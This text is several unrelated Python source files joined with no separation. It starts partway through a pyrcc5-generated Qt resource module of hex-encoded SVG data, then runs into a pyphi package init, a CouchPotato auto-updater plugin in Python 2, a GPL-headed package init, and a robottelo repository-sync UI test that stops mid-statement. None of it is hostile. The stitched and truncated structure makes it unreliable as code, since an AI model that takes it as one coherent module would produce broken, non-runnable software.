\x31\x2e\x31\x39\x38\x36\x36\x39\x33\x39\x36\x39\x20\x31\x35\x2e\
\x33\x34\x32\x36\x31\x37\x35\x36\x35\x36\x20\x31\x31\x2e\x32\x33\
\x38\x39\x30\x39\x32\x30\x33\x37\x20\x31\x35\x2e\x33\x34\x38\x38\
\x35\x38\x36\x33\x34\x34\x20\x31\x31\x2e\x32\x37\x39\x33\x37\x32\
\x39\x38\x36\x37\x20\x43\x20\x31\x35\x2e\x33\x35\x35\x30\x39\x39\
\x37\x30\x33\x33\x20\x31\x31\x2e\x33\x31\x39\x38\x33\x36\x37\x36\
\x39\x36\x20\x31\x35\x2e\x33\x36\x31\x33\x34\x30\x37\x37\x32\x31\
\x20\x31\x31\x2e\x33\x36\x30\x35\x32\x35\x38\x37\x33\x20\x31\x35\
\x2e\x33\x36\x37\x35\x38\x31\x38\x34\x31\x20\x31\x31\x2e\x34\x30\
\x31\x34\x30\x37\x35\x39\x38\x35\x20\x43\x20\x31\x35\x2e\x33\x37\
\x33\x38\x32\x32\x39\x30\x39\x38\x20\x31\x31\x2e\x34\x34\x32\x32\
\x38\x39\x33\x32\x33\x39\x20\x31\x35\x2e\x33\x38\x30\x30\x36\x33\
\x39\x37\x38\x36\x20\x31\x31\x2e\x34\x38\x33\x33\x36\x34\x38\x32\
\x37\x32\x20\x31\x35\x2e\x33\x38\x36\x33\x30\x35\x30\x34\x37\x35\
\x20\x31\x31\x2e\x35\x32\x34\x36\x30\x31\x33\x30\x30\x36\x20\x43\
\x20\x31\x35\x2e\x33\x39\x32\x35\x34\x36\x31\x31\x36\x33\x20\x31\
\x31\x2e\x35\x36\x35\x38\x33\x37\x37\x37\x34\x20\x31\x35\x2e\x33\
\x39\x38\x37\x38\x37\x31\x38\x35\x31\x20\x31\x31\x2e\x36\x30\x37\
\x32\x33\x36\x31\x38\x33\x20\x31\x35\x2e\x34\x30\x35\x30\x32\x38\
\x32\x35\x34\x20\x31\x31\x2e\x36\x34\x38\x37\x36\x33\x36\x36\x31\
\x36\x20\x43\x20\x31\x35\x2e\x34\x31\x31\x32\x36\x39\x33\x32\x32\
\x38\x20\x31\x31\x2e\x36\x39\x30\x32\x39\x31\x31\x34\x30\x31\x20\
\x31\x35\x2e\x34\x31\x37\x35\x31\x30\x33\x39\x31\x36\x20\x31\x31\
\x2e\x37\x33\x31\x39\x34\x38\x34\x36\x31\x36\x20\x31\x35\x2e\x34\
\x32\x33\x37\x35\x31\x34\x36\x30\x35\x20\x31\x31\x2e\x37\x37\x33\
\x37\x30\x32\x37\x35\x32\x35\x20\x43\x20\x31\x35\x2e\x34\x32\x39\
\x39\x39\x32\x35\x32\x39\x33\x20\x31\x31\x2e\x38\x31\x35\x34\x35\
\x37\x30\x34\x33\x35\x20\x31\x35\x2e\x34\x33\x36\x32\x33\x33\x35\
\x39\x38\x31\x20\x31\x31\x2e\x38\x35\x37\x33\x30\x38\x38\x38\x34\
\x31\x20\x31\x35\x2e\x34\x34\x32\x34\x37\x34\x36\x36\x37\x20\x31\
\x31\x2e\x38\x39\x39\x32\x32\x35\x34\x34\x34\x20\x43\x20\x31\x35\
\x2e\x34\x34\x38\x37\x31\x35\x37\x33\x35\x38\x20\x31\x31\x2e\x39\
\x34\x31\x31\x34\x32\x30\x30\x34\x20\x31\x35\x2e\x34\x35\x34\x39\
\x35\x36\x38\x30\x34\x37\x20\x31\x31\x2e\x39\x38\x33\x31\x32\x33\
\x36\x36\x39\x36\x20\x31\x35\x2e\x34\x36\x31\x31\x39\x37\x38\x37\
\x33\x35\x20\x31\x32\x2e\x30\x32\x35\x31\x33\x37\x37\x30\x34\x35\
\x20\x43\x20\x31\x35\x2e\x34\x36\x37\x34\x33\x38\x39\x34\x32\x33\
\x20\x31\x32\x2e\x30\x36\x37\x31\x35\x31\x37\x33\x39\x33\x20\x31\
\x35\x2e\x34\x37\x33\x36\x38\x30\x30\x31\x31\x32\x20\x31\x32\x2e\
\x31\x30\x39\x31\x39\x38\x33\x33\x35\x31\x20\x31\x35\x2e\x34\x37\
\x39\x39\x32\x31\x30\x38\x20\x31\x32\x2e\x31\x35\x31\x32\x34\x34\
\x39\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x73\x74\x79\x6c\x65\x3d\
\x22\x66\x69\x6c\x6c\x3a\x6e\x6f\x6e\x65\x3b\x66\x69\x6c\x6c\x2d\
\x6f\x70\x61\x63\x69\x74\x79\x3a\x31\x3b\x73\x74\x72\x6f\x6b\x65\
\x3a\x23\x66\x66\x30\x30\x30\x30\x3b\x73\x74\x72\x6f\x6b\x65\x2d\
\x77\x69\x64\x74\x68\x3a\x30\x2e\x39\x34\x34\x38\x38\x31\x38\x39\
\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x6d\x69\x74\x65\x72\x6c\x69\x6d\
\x69\x74\x3a\x34\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x64\x61\x73\x68\
\x61\x72\x72\x61\x79\x3a\x6e\x6f\x6e\x65\x3b\x73\x74\x72\x6f\x6b\
\x65\x2d\x6f\x70\x61\x63\x69\x74\x79\x3a\x31\x22\x20\x2f\x3e\x0a\
\x20\x20\x3c\x2f\x67\x3e\x0a\x3c\x2f\x73\x76\x67\x3e\x0a\
"

# Machine-generated resource name table (appears to be pyrcc5 output — do not
# hand-edit the byte content).  Encodes each resource path segment as:
# 2-byte length, 4-byte hash, then the UTF-16-BE characters of the name.
qt_resource_name = b"\
\x00\x05\
\x00\x6f\xa6\x53\
\x00\x69\
\x00\x63\x00\x6f\x00\x6e\x00\x73\
\x00\x04\
\x00\x06\xa8\xa1\
\x00\x64\
\x00\x61\x00\x74\x00\x61\
\x00\x0c\
\x05\x21\x11\x87\
\x00\x64\
\x00\x65\x00\x63\x00\x6f\x00\x64\x00\x69\x00\x6e\x00\x67\x00\x2e\x00\x73\x00\x76\x00\x67\
\x00\x08\
\x05\x9e\x54\xa7\
\x00\x6c\
\x00\x6f\x00\x63\x00\x6b\x00\x2e\x00\x73\x00\x76\x00\x67\
\x00\x0a\
\x08\x3b\xcb\xa7\
\x00\x65\
\x00\x71\x00\x75\x00\x61\x00\x6c\x00\x73\x00\x2e\x00\x73\x00\x76\x00\x67\
\x00\x0b\
\x0c\x31\xc5\x47\
\x00\x73\
\x00\x6e\x00\x69\x00\x66\x00\x66\x00\x65\x00\x72\x00\x2e\x00\x73\x00\x76\x00\x67\
\x00\x1e\
\x09\xc6\x50\xc7\
\x00\x73\
\x00\x70\x00\x6c\x00\x69\x00\x74\x00\x74\x00\x65\x00\x72\x00\x5f\x00\x68\x00\x61\x00\x6e\x00\x64\x00\x6c\x00\x65\x00\x5f\x00\x68\
\x00\x6f\x00\x72\x00\x69\x00\x7a\x00\x6f\x00\x6e\x00\x74\x00\x61\x00\x6c\x00\x2e\x00\x73\x00\x76\x00\x67\
\x00\x08\
\x03\xc6\x54\x27\
\x00\x70\
\x00\x6c\x00\x75\x00\x73\x00\x2e\x00\x73\x00\x76\x00\x67\
\x00\x0c\
\x06\xf5\x2f\xa7\
\x00\x73\
\x00\x70\x00\x65\x00\x63\x00\x74\x00\x72\x00\x75\x00\x6d\x00\x2e\x00\x73\x00\x76\x00\x67\
\x00\x0a\
\x05\x95\xd0\xa7\
\x00\x75\
\x00\x6e\x00\x6c\x00\x6f\x00\x63\x00\x6b\x00\x2e\x00\x73\x00\x76\x00\x67\
\x00\x0b\
\x0a\xb1\xba\xa7\
\x00\x61\
\x00\x70\x00\x70\x00\x69\x00\x63\x00\x6f\x00\x6e\x00\x2e\x00\x70\x00\x6e\x00\x67\
\x00\x0d\
\x0f\x6b\x5c\x47\
\x00\x65\
\x00\x71\x00\x75\x00\x61\x00\x6c\x00\x73\x00\x5f\x00\x71\x00\x6d\x00\x2e\x00\x73\x00\x76\x00\x67\
\x00\x1c\
\x08\x58\xf4\x07\
\x00\x73\
\x00\x70\x00\x6c\x00\x69\x00\x74\x00\x74\x00\x65\x00\x72\x00\x5f\x00\x68\x00\x61\x00\x6e\x00\x64\x00\x6c\x00\x65\x00\x5f\x00\x76\
\x00\x65\x00\x72\x00\x74\x00\x69\x00\x63\x00\x61\x00\x6c\x00\x2e\x00\x73\x00\x76\x00\x67\
\x00\x0e\
\x07\x59\x16\x87\
\x00\x6d\
\x00\x6f\x00\x64\x00\x75\x00\x6c\x00\x61\x00\x74\x00\x69\x00\x6f\x00\x6e\x00\x2e\x00\x73\x00\x76\x00\x67\
"

# Machine-generated resource tree (rcc format 1, used for Qt < 5.8).
# Each 14-byte record indexes into qt_resource_name / qt_resource_data.
# Do not hand-edit the byte content.
qt_resource_struct_v1 = b"\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x01\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x02\
\x00\x00\x00\x10\x00\x02\x00\x00\x00\x01\x00\x00\x00\x03\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x0c\x00\x00\x00\x04\
\x00\x00\x00\xca\x00\x00\x00\x00\x00\x01\x00\x00\x3e\xd9\
\x00\x00\x00\x1e\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\
\x00\x00\x00\xfe\x00\x00\x00\x00\x00\x01\x00\x00\x52\x1c\
\x00\x00\x00\x3c\x00\x00\x00\x00\x00\x01\x00\x00\x07\x2b\
\x00\x00\x00\xe0\x00\x00\x00\x00\x00\x01\x00\x00\x49\x15\
\x00\x00\x01\x92\x00\x00\x00\x00\x00\x01\x00\x00\x98\xbc\
\x00\x00\x00\x52\x00\x00\x00\x00\x00\x01\x00\x00\x14\x8d\
\x00\x00\x01\x54\x00\x00\x00\x00\x00\x01\x00\x00\x8f\x48\
\x00\x00\x00\x88\x00\x00\x00\x00\x00\x01\x00\x00\x35\xc3\
\x00\x00\x01\x18\x00\x00\x00\x00\x00\x01\x00\x00\x5f\x2c\
\x00\x00\x00\x6c\x00\x00\x00\x00\x00\x01\x00\x00\x1f\x7a\
\x00\x00\x01\x34\x00\x00\x00\x00\x00\x01\x00\x00\x84\x04\
"

# Machine-generated resource tree (rcc format 2, used for Qt >= 5.8).
# Same records as the v1 table, each followed by an 8-byte last-modified
# timestamp.  Do not hand-edit the byte content.
qt_resource_struct_v2 = b"\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x01\
\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x02\
\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x10\x00\x02\x00\x00\x00\x01\x00\x00\x00\x03\
\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x0c\x00\x00\x00\x04\
\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\xca\x00\x00\x00\x00\x00\x01\x00\x00\x3e\xd9\
\x00\x00\x01\x60\x08\x38\xde\x1c\
\x00\x00\x00\x1e\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\
\x00\x00\x01\x60\x08\x38\xde\x1b\
\x00\x00\x00\xfe\x00\x00\x00\x00\x00\x01\x00\x00\x52\x1c\
\x00\x00\x01\x60\x08\x38\xde\x1d\
\x00\x00\x00\x3c\x00\x00\x00\x00\x00\x01\x00\x00\x07\x2b\
\x00\x00\x01\x60\x08\x38\xde\x1c\
\x00\x00\x00\xe0\x00\x00\x00\x00\x00\x01\x00\x00\x49\x15\
\x00\x00\x01\x60\x08\x38\xde\x1d\
\x00\x00\x01\x92\x00\x00\x00\x00\x00\x01\x00\x00\x98\xbc\
\x00\x00\x01\x60\x08\x38\xde\x1c\
\x00\x00\x00\x52\x00\x00\x00\x00\x00\x01\x00\x00\x14\x8d\
\x00\x00\x01\x60\x08\x38\xde\x1b\
\x00\x00\x01\x54\x00\x00\x00\x00\x00\x01\x00\x00\x8f\x48\
\x00\x00\x01\x60\x08\x38\xde\x1d\
\x00\x00\x00\x88\x00\x00\x00\x00\x00\x01\x00\x00\x35\xc3\
\x00\x00\x01\x60\x08\x38\xde\x1d\
\x00\x00\x01\x18\x00\x00\x00\x00\x00\x01\x00\x00\x5f\x2c\
\x00\x00\x01\x60\x08\x38\xde\x1b\
\x00\x00\x00\x6c\x00\x00\x00\x00\x00\x01\x00\x00\x1f\x7a\
\x00\x00\x01\x60\x08\x38\xde\x1c\
\x00\x00\x01\x34\x00\x00\x00\x00\x00\x01\x00\x00\x84\x04\
\x00\x00\x01\x60\x08\x38\xde\x1b\
"

# Select the rcc format matching the runtime Qt version: format 2 was
# introduced in Qt 5.8.
qt_version = QtCore.qVersion().split('.')
# BUG FIX: the original compared the version as a list of *strings*, which is
# lexicographic — e.g. ['5', '10', '0'] < ['5', '8', '0'] is True because
# '1' < '8', so Qt >= 5.10 was wrongly given the pre-5.8 format-1 tables.
# Compare the components numerically instead.  `qt_version` itself keeps its
# original string-list value for any external readers.
if tuple(int(part) for part in qt_version[:3]) < (5, 8, 0):
    rcc_version = 1
    qt_resource_struct = qt_resource_struct_v1
else:
    rcc_version = 2
    qt_resource_struct = qt_resource_struct_v2

def qInitResources():
    """Register the embedded resource data with the Qt resource system."""
    QtCore.qRegisterResourceData(rcc_version, qt_resource_struct, qt_resource_name, qt_resource_data)

def qCleanupResources():
    """Unregister the embedded resource data from the Qt resource system."""
    QtCore.qUnregisterResourceData(rcc_version, qt_resource_struct, qt_resource_name, qt_resource_data)

# Register the resources as soon as this generated module is imported.
qInitResources()

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# compute/__init__.py

"""
See |compute.subsystem|, |compute.network|, |compute.distance|, and
|compute.parallel| for documentation.

Attributes:
    all_complexes: Alias for :func:`pyphi.compute.network.all_complexes`.
    ces: Alias for :func:`pyphi.compute.subsystem.ces`.
    ces_distance: Alias for :func:`pyphi.compute.distance.ces_distance`.
    complexes: Alias for :func:`pyphi.compute.network.complexes`.
    concept_distance: Alias for
        :func:`pyphi.compute.distance.concept_distance`.
    conceptual_info: Alias for :func:`pyphi.compute.subsystem.conceptual_info`.
    condensed: Alias for :func:`pyphi.compute.network.condensed`.
    evaluate_cut: Alias for :func:`pyphi.compute.subsystem.evaluate_cut`.
    major_complex: Alias for :func:`pyphi.compute.network.major_complex`.
    phi: Alias for :func:`pyphi.compute.subsystem.phi`.
    possible_complexes: Alias for
        :func:`pyphi.compute.network.possible_complexes`.
    sia: Alias for :func:`pyphi.compute.subsystem.sia`.
    subsystems: Alias for :func:`pyphi.compute.network.subsystems`.
"""

# pylint: disable=unused-import

from .distance import ces_distance, concept_distance
from .network import (
    all_complexes,
    complexes,
    condensed,
    major_complex,
    possible_complexes,
    subsystems,
)
from .subsystem import (
    ConceptStyleSystem,
    SystemIrreducibilityAnalysisConceptStyle,
    ces,
    concept_cuts,
    conceptual_info,
    evaluate_cut,
    phi,
    sia,
    sia_concept_style,
)

from couchpotato.api import addApiView
from couchpotato.core.event import addEvent, fireEvent, fireEventAsync
from couchpotato.core.helpers.encoding import ss
from couchpotato.core.helpers.request import jsonified
from couchpotato.core.logger import CPLog
from couchpotato.core.plugins.base import Plugin
from couchpotato.environment import Env
from datetime import datetime
from dateutil.parser import parse
from git.repository import LocalRepository
import json
import os
import shutil
import tarfile
import time
import traceback
import version

log = CPLog(__name__)


class Updater(Plugin):
    """Facade plugin that selects a concrete updater backend (desktop, git
    or source tarball) and wires it into the scheduler, event bus and API."""

    # Set once the user has been notified that an update is available, so the
    # notification is not repeated on every scheduled check.
    available_notified = False

    def __init__(self):

        # Pick the backend based on how the application is deployed:
        # packaged desktop build, git checkout, or plain source install.
        if Env.get('desktop'):
            self.updater = DesktopUpdater()
        elif os.path.isdir(os.path.join(Env.get('app_dir'), '.git')):
            self.updater = GitUpdater(self.conf('git_command', default = 'git'))
        else:
            self.updater = SourceUpdater()

        # Check for updates every 6 hours and once at application start.
        fireEvent('schedule.interval', 'updater.check', self.autoUpdate, hours = 6)
        addEvent('app.load', self.autoUpdate)
        addEvent('updater.info', self.info)

        addApiView('updater.info', self.getInfo, docs = {
            'desc': 'Get updater information',
            'return': {
                'type': 'object',
                'example': """{
        'last_check': "last checked for update",
        'update_version': "available update version or empty",
        'version': current_cp_version
}"""}
        })
        addApiView('updater.update', self.doUpdateView)
        addApiView('updater.check', self.checkView, docs = {
            'desc': 'Check for available update',
            'return': {'type': 'see updater.info'}
        })

    def autoUpdate(self):
        """Check for an update and, when automatic updating is enabled and the
        last attempt did not fail, apply it and restart the application.

        Returns True when an update was applied, False otherwise.
        """
        if self.check() and self.conf('automatic') and not self.updater.update_failed:
            if self.updater.doUpdate():

                # Notify before restarting
                try:
                    if self.conf('notification'):
                        info = self.updater.info()
                        version_date = datetime.fromtimestamp(info['update_version']['date'])
                        fireEvent('updater.updated', 'Updated to a new version with hash "%s", this version is from %s' % (info['update_version']['hash'], version_date), data = info)
                except:
                    log.error('Failed notifying for update: %s', traceback.format_exc())

                fireEventAsync('app.restart')

                return True

        return False

    def check(self):
        """Ask the backend whether an update is available; fire a one-time
        'updater.available' notification when updates are manual."""
        if self.isDisabled():
            return

        if self.updater.check():
            if not self.available_notified and self.conf('notification') and not self.conf('automatic'):
                fireEvent('updater.available', message = 'A new update is available', data = self.updater.info())
                self.available_notified = True
            return True

        return False

    def info(self):
        # Delegate to the active backend.
        return self.updater.info()

    def getInfo(self):
        # API view: backend info serialized as JSON.
        return jsonified(self.updater.info())

    def checkView(self):
        # API view: run a check and report availability plus backend info.
        return jsonified({
            'update_available': self.check(),
            'info': self.updater.info()
        })

    def doUpdateView(self):
        """API view: trigger an update; schedules an async restart on success."""

        self.check()
        if not self.updater.update_version:
            log.error('Trying to update when no update is available.')
            success = False
        else:
            success = self.updater.doUpdate()
            if success:
                fireEventAsync('app.restart')

            # Assume the updater handles things
            if not success:
                success = True

        return jsonified({
            'success': success
        })


class BaseUpdater(Plugin):
    """Shared state and helpers for the concrete updater backends."""

    # GitHub repository updates are pulled from.
    repo_user = 'jayme-github'
    repo_name = 'CouchPotatoServer'
    branch = version.BRANCH

    version = None          # cached result of getVersion()
    update_failed = False   # set when the last update attempt failed
    update_version = None   # info dict of an available update, if any
    last_check = 0          # timestamp of the last completed check

    def doUpdate(self):
        """Perform the actual update; implemented by subclasses."""
        pass

    def getInfo(self):
        # JSON-serialized variant of info() for API consumers.
        return jsonified(self.info())

    def info(self):
        """Return a dict describing the current and available versions."""
        return {
            'last_check': self.last_check,
            'update_version': self.update_version,
            'version': self.getVersion(),
            'repo_name': '%s/%s' % (self.repo_user, self.repo_name),
            'branch': self.branch,
        }

    def check(self):
        """Check whether an update is available; implemented by subclasses."""
        pass

    def deletePyc(self, only_excess = True):
        """Remove stale .pyc files under the application directory.

        With only_excess (the default) only orphaned .pyc files -- those whose
        matching .py source no longer exists -- are removed; otherwise all
        .pyc files are. Directories left empty are removed as well.
        """

        for root, dirs, files in os.walk(ss(Env.get('app_dir'))):

            pyc_files = filter(lambda filename: filename.endswith('.pyc'), files)
            py_files = set(filter(lambda filename: filename.endswith('.py'), files))
            # A .pyc is "excess" when stripping the trailing 'c' does not name
            # an existing .py file in the same directory.
            excess_pyc_files = filter(lambda pyc_filename: pyc_filename[:-1] not in py_files, pyc_files) if only_excess else pyc_files

            for excess_pyc_file in excess_pyc_files:
                full_path = os.path.join(root, excess_pyc_file)
                log.debug('Removing old PYC file: %s', full_path)
                try:
                    os.remove(full_path)
                except:
                    log.error('Couldn\'t remove %s: %s', (full_path, traceback.format_exc()))

            for dir_name in dirs:
                full_path = os.path.join(root, dir_name)
                if len(os.listdir(full_path)) == 0:
                    try:
                        os.rmdir(full_path)
                    except:
                        log.error('Couldn\'t remove empty directory %s: %s', (full_path, traceback.format_exc()))



class GitUpdater(BaseUpdater):
    """Updater backend for installations running from a git checkout."""

    def __init__(self, git_command):
        self.repo = LocalRepository(Env.get('app_dir'), command = git_command)

    def doUpdate(self):
        """Stash local changes and pull the latest commit from the remote."""

        try:
            log.debug('Stashing local changes')
            self.repo.saveStash()

            log.info('Updating to latest version')
            self.repo.pull()

            # Delete leftover .pyc files
            self.deletePyc()

            return True
        except:
            log.error('Failed updating via GIT: %s', traceback.format_exc())

        self.update_failed = True

        return False

    def getVersion(self):
        """Return (and cache) hash/date info of the current git HEAD, or the
        string 'No GIT' when git is unusable."""

        if not self.version:
            try:
                output = self.repo.getHead() # Yes, please
                log.debug('Git version output: %s', output.hash)
                self.version = {
                    'hash': output.hash[:8],
                    'date': output.getDate(),
                    'type': 'git',
                }
            except Exception, e:
                log.error('Failed using GIT updater, running from source, you need to have GIT installed. %s', e)
                return 'No GIT'

        return self.version

    def check(self):
        """Fetch the remote and compare commit dates on the current branch to
        detect whether a newer commit is available."""

        if self.update_version:
            return True

        log.info('Checking for new version on github for %s', self.repo_name)
        if not Env.get('dev'):
            self.repo.fetch()

        current_branch = self.repo.getCurrentBranch().name

        for branch in self.repo.getRemoteByName('origin').getBranches():
            if current_branch == branch.name:

                local = self.repo.getHead()
                remote = branch.getHead()

                log.info('Versions, local:%s, remote:%s', (local.hash[:8], remote.hash[:8]))

                # A strictly newer commit date on the remote side means an
                # update is available.
                if local.getDate() < remote.getDate():
                    self.update_version = {
                        'hash': remote.hash[:8],
                        'date': remote.getDate(),
                    }
                    return True

        self.last_check = time.time()
        return False



class SourceUpdater(BaseUpdater):
    """Updater backend for plain source installs: downloads the latest GitHub
    tarball for the configured branch and replaces the app files in place."""

    def __init__(self):

        # Create version file in cache
        self.version_file = os.path.join(Env.get('cache_dir'), 'version')
        if not os.path.isfile(self.version_file):
            self.createFile(self.version_file, json.dumps(self.latestCommit()))

    def doUpdate(self):
        """Download, extract and install the latest tarball for our branch."""

        try:
            url = 'https://github.com/%s/%s/tarball/%s' % (self.repo_user, self.repo_name, self.branch)
            destination = os.path.join(Env.get('cache_dir'), self.update_version.get('hash') + '.tar.gz')
            extracted_path = os.path.join(Env.get('cache_dir'), 'temp_updater')

            destination = fireEvent('file.download', url = url, dest = destination, single = True)

            # Cleanup leftover from last time
            if os.path.isdir(extracted_path):
                self.removeDir(extracted_path)
            self.makeDir(extracted_path)

            # Extract
            tar = tarfile.open(destination)
            tar.extractall(path = extracted_path)
            tar.close()
            os.remove(destination)

            # The tarball contains a single top-level directory; install from it.
            if self.replaceWith(os.path.join(extracted_path, os.listdir(extracted_path)[0])):
                self.removeDir(extracted_path)

                # Write update version to file
                self.createFile(self.version_file, json.dumps(self.update_version))

                return True
        except:
            log.error('Failed updating: %s', traceback.format_exc())

        self.update_failed = True
        return False

    def replaceWith(self, path):
        """Overwrite the application directory with the files under `path`,
        then delete files that are no longer part of the distribution.

        Returns True on success, False when any file could not be replaced.
        """
        app_dir = ss(Env.get('app_dir'))

        # Get list of files we want to overwrite
        self.deletePyc()
        existing_files = []
        for root, subfiles, filenames in os.walk(app_dir):
            for filename in filenames:
                existing_files.append(os.path.join(root, filename))

        for root, subfiles, filenames in os.walk(path):
            for filename in filenames:
                fromfile = os.path.join(root, filename)
                tofile = os.path.join(app_dir, fromfile.replace(path + os.path.sep, ''))

                # In dev mode the files are left untouched.
                if not Env.get('dev'):
                    try:
                        if os.path.isfile(tofile):
                            os.remove(tofile)

                        dirname = os.path.dirname(tofile)
                        if not os.path.isdir(dirname):
                            self.makeDir(dirname)

                        shutil.move(fromfile, tofile)
                        try:
                            existing_files.remove(tofile)
                        except ValueError:
                            pass
                    except:
                        log.error('Failed overwriting file "%s": %s', (tofile, traceback.format_exc()))
                        return False

        # Whatever is still listed was not part of the new version; remove it,
        # unless the data dir lives inside the app dir (safety guard).
        if Env.get('app_dir') not in Env.get('data_dir'):
            for still_exists in existing_files:
                try:
                    os.remove(still_exists)
                except:
                    log.error('Failed removing non-used file: %s', traceback.format_exc())

        return True


    def removeDir(self, path):
        """Recursively delete `path`, retrying after a chmod when a file is
        not writable (common on Windows)."""
        try:
            if os.path.isdir(path):
                shutil.rmtree(path)
        except OSError, inst:
            os.chmod(inst.filename, 0777)
            self.removeDir(path)

    def getVersion(self):
        """Return (and cache) the version info stored in the cache file, or
        an empty dict when the file cannot be read."""

        if not self.version:
            try:
                f = open(self.version_file, 'r')
                output = json.loads(f.read())
                f.close()

                log.debug('Source version output: %s', output)
                self.version = output
                self.version['type'] = 'source'
            except Exception, e:
                log.error('Failed using source updater. %s', e)
                return {}

        return self.version

    def check(self):
        """Compare the newest GitHub commit against the installed version."""

        current_version = self.getVersion()

        try:
            latest = self.latestCommit()

            # A different hash with an equal-or-newer date means an update.
            if latest.get('hash') != current_version.get('hash') and latest.get('date') >= current_version.get('date'):
                self.update_version = latest

            self.last_check = time.time()
        except:
            log.error('Failed updating via source: %s', traceback.format_exc())

        return self.update_version is not None

    def latestCommit(self):
        """Return hash/date of the newest commit on our branch from the
        GitHub API, or an empty dict on failure."""
        try:
            url = 'https://api.github.com/repos/%s/%s/commits?per_page=1&sha=%s' % (self.repo_user, self.repo_name, self.branch)
            data = self.getCache('github.commit', url = url)
            commit = json.loads(data)[0]

            return {
                'hash': commit['sha'],
                'date':  int(time.mktime(parse(commit['commit']['committer']['date']).timetuple())),
            }
        except:
            log.error('Failed getting latest request from github: %s', traceback.format_exc())

        return {}


class DesktopUpdater(BaseUpdater):
    """Updater backend for packaged desktop builds, delegating to esky."""

    def __init__(self):
        self.desktop = Env.get('desktop')

    def doUpdate(self):
        """Start an asynchronous esky auto-update; restarts via callback."""
        try:
            def do_restart(e):
                # esky progress callback: restart when done, flag failure on error.
                if e['status'] == 'done':
                    fireEventAsync('app.restart')
                elif e['status'] == 'error':
                    log.error('Failed updating desktop: %s', e['exception'])
                    self.update_failed = True

            self.desktop._esky.auto_update(callback = do_restart)
            return
        except:
            self.update_failed = True

        return False

    def info(self):
        # Like BaseUpdater.info() but without the repo_name entry, which is
        # meaningless for packaged builds.
        return {
            'last_check': self.last_check,
            'update_version': self.update_version,
            'version': self.getVersion(),
            'branch': self.branch,
        }

    def check(self):
        """Ask esky whether a version newer than the active one exists."""
        current_version = self.getVersion()
        try:
            latest = self.desktop._esky.find_update()

            if latest and latest != current_version.get('hash'):
                self.update_version = {
                    'hash': latest,
                    'date':  None,
                    'changelog': self.desktop._changelogURL,
                }

            self.last_check = time.time()
        except:
            log.error('Failed updating desktop: %s', traceback.format_exc())

        return self.update_version is not None

    def getVersion(self):
        # The esky "active version" string stands in for a commit hash.
        return {
            'hash': self.desktop._esky.active_version,
            'date': None,
            'type': 'desktop',
        }

# -*- coding: utf-8 -*-
#------------------------------------------------------------------------------
# file: $Id$
# auth: metagriffin <mg.github@uberdev.org>
# date: 2012/04/20
# copy: (C) Copyright 2012-EOT metagriffin -- see LICENSE.txt
#------------------------------------------------------------------------------
# This software is free software: you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This software is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see http://www.gnu.org/licenses/.
#------------------------------------------------------------------------------

from .tracker import *
from .merger import *

#------------------------------------------------------------------------------
# end of $Id$
#------------------------------------------------------------------------------

"""Test class for Custom Sync UI

:Requirement: Sync

:CaseAutomation: Automated

:CaseLevel: Acceptance

:CaseComponent: Repositories

:TestType: Functional

:CaseImportance: High

:Upstream: No
"""
from fauxfactory import gen_string
from nailgun import entities

from robottelo import manifests
from robottelo.api.utils import enable_rhrepo_and_fetchid
from robottelo.constants import (
    DISTRO_RHEL6, DISTRO_RHEL7,
    DOCKER_REGISTRY_HUB,
    DOCKER_UPSTREAM_NAME,
    FAKE_1_YUM_REPO,
    FEDORA27_OSTREE_REPO,
    REPOS,
    REPOSET,
    REPO_TYPE,
    PRDS,
)
from robottelo.decorators import (
    fixture,
    run_in_one_thread,
    skip_if_not_set,
    tier2,
    upgrade,
    skip_if_bug_open,
)
from robottelo.decorators.host import skip_if_os
from robottelo.products import (
    RepositoryCollection,
    RHELCloudFormsTools,
    SatelliteCapsuleRepository,
)


@fixture(scope='module')
def module_org():
    """Module-scoped fixture: a fresh Organization created via the API."""
    return entities.Organization().create()


@fixture(scope='module')
def module_custom_product(module_org):
    """Module-scoped fixture: a custom Product inside the module org."""
    return entities.Product(organization=module_org).create()


@fixture(scope='module')
def module_org_with_manifest():
    """Module-scoped fixture: an Organization with a manifest uploaded,
    enabling Red Hat repositories for the tests that need them."""
    org = entities.Organization().create()
    manifests.upload_manifest_locked(org.id)
    return org


@tier2
def test_positive_sync_custom_repo(session, module_custom_product):
    """Create Content Custom Sync with minimal input parameters

    :id: 00fb0b04-0293-42c2-92fa-930c75acee89

    :expectedresults: Sync procedure is successful

    :CaseImportance: Critical
    """
    repo = entities.Repository(
        url=FAKE_1_YUM_REPO, product=module_custom_product).create()
    with session:
        # Trigger the sync from the Sync Status page; exactly one result is
        # expected and it must report completion.
        results = session.sync_status.synchronize([
            (module_custom_product.name, repo.name)])
        assert len(results) == 1
        assert results[0] == 'Syncing Complete.'


@run_in_one_thread
@skip_if_not_set('fake_manifest')
@tier2
@upgrade
def test_positive_sync_rh_repos(session, module_org_with_manifest):
    """Create Content RedHat Sync with two repos.

    :id: e30f6509-0b65-4bcc-a522-b4f3089d3911

    :expectedresults: Sync procedure for RedHat Repos is successful

    :CaseLevel: Integration
    """
    # One capsule repo on RHEL7 and one CloudForms tools repo on RHEL6.
    repositories = (
        SatelliteCapsuleRepository(cdn=True),
        RHELCloudFormsTools(cdn=True)
    )
    collections = [
        RepositoryCollection(distro=distro_name, repositories=[repository])
